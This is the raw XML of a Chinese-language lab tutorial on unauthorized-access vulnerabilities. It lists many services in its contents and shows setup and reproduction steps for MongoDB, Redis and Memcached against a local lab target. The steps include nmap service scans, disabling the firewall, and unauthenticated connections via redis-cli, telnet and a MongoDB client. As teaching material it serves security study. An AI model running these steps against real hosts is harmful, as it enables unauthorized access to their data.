              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3562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_Toc3627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21.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3627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_Toc10395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22. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Druid未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10395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_Toc17062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22.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17062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_Toc18342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22.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18342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_Toc20912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23. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows ipc共享未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20912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_Toc28962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24. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>宝塔未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28962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_Toc10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24.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10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_Toc22983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24.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22983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_Toc3741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25. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>PHP-FPM Fastcgi未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3741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_Toc27048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25.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27048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_Toc27861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25.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27861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_Toc25492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26. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Weblogic未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25492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_Toc1776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26.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1776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_Toc11455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26.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11455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_Toc22427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27. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>uWSGI未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22427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_Toc24155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27.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24155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_Toc24464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27.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24464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_Toc22854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28. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>WordPress未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22854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_Toc31509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28.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31509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_Toc5125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28.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5125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_Toc3214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29. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kong未授权访问漏洞(CVE-2020-11710)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3214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_Toc23960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29.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23960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_Toc27774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29.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27774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_Toc25581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30. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>ThinkAdminV6未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25581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_Toc21162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30.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>环境部署</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21162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_Toc771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30.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc771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Cs w:val="40"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc18748 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:szCs w:val="40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31. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>参考</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18748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rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:szCs w:val="40"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="40"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:szCs w:val="40"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc11622"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>MongoDB未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc7839"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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search mongodb  # 从Docker Hub查找镜像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pull mongo  #从镜像仓库中拉取或者更新指定镜像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images mongo #列出本地主机上的mongo镜像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 -d -p 27017:27017 --name mongodb mongo  # 创建一个新的容器并运行一个命令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ps  # 显示正在运行的容器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364490"/>
            <wp:effectExtent l="0" t="0" r="3175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此处通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nmap进行扫描，发现端口状态为filtered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root@kali:~# nmap -p 27017 --script mongodb-info 192.168.96.128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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4076700" cy="27432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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>在靶机上，执行以下命令：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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t> echo  "net.ipv4.ip_forward = 1"  &gt;&gt;  /usr/lib/sysctl.d/00-system.conf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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t> systemctl  restart  network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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>关闭防火墙：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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>systemctl stop firewalld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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>重新扫描发现端口状态变为open：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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>root@kali:~# nmap -p 27017 --script mongodb-info 192.168.96.128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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4406900" cy="26797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267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" w:name="_Toc371"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用工具nosqlbooster4mongo-6.1.8.exe（https://s3.mongobooster.com/download/releasesv6/nosqlbooster4mongo-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>6.1.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exe）进行连接：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7960" cy="371729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17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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pP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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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</w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc21676"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Redis 未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc19024"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>[root@localhost vulhub-master]# cd redis/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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>[root@localhost redis]# ls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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>4-unacc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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>[root@localhost redis]# cd 4-unacc/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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>[root@localhost 4-unacc]# ls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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>1.png  docker-compose.yml  README.md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00" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>[root@localhost 4-unacc]# docker-compose build&amp;&amp;docker-compose up -d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5" w:name="_Toc13353"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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使用nmap进行扫描：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nmap -A -p 6379 --script redis-info 192.168.96.128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3702050"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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0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./redis-cli -h 192.168.96.128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22700" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="0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397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</w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc3137"/>
      <w:r>
        <w:t>Memcached 未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Cve编号：</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2013-7239</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc8515"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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memcached安装参考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/weixin_42231507/article/details/81147203" </w:instrTex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https://blog.csdn.net/weixin_42231507/article/details/81147203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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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netstat -an |more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134360"/>
            <wp:effectExtent l="0" t="0" r="1270" b="254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34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8" w:name="_Toc12237"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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t>nmap -sV -p11211 --script memcached-info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.96.128</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2540000"/>
            <wp:effectExtent l="0" t="0" r="127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t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.96.128 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">11211 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="595959"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
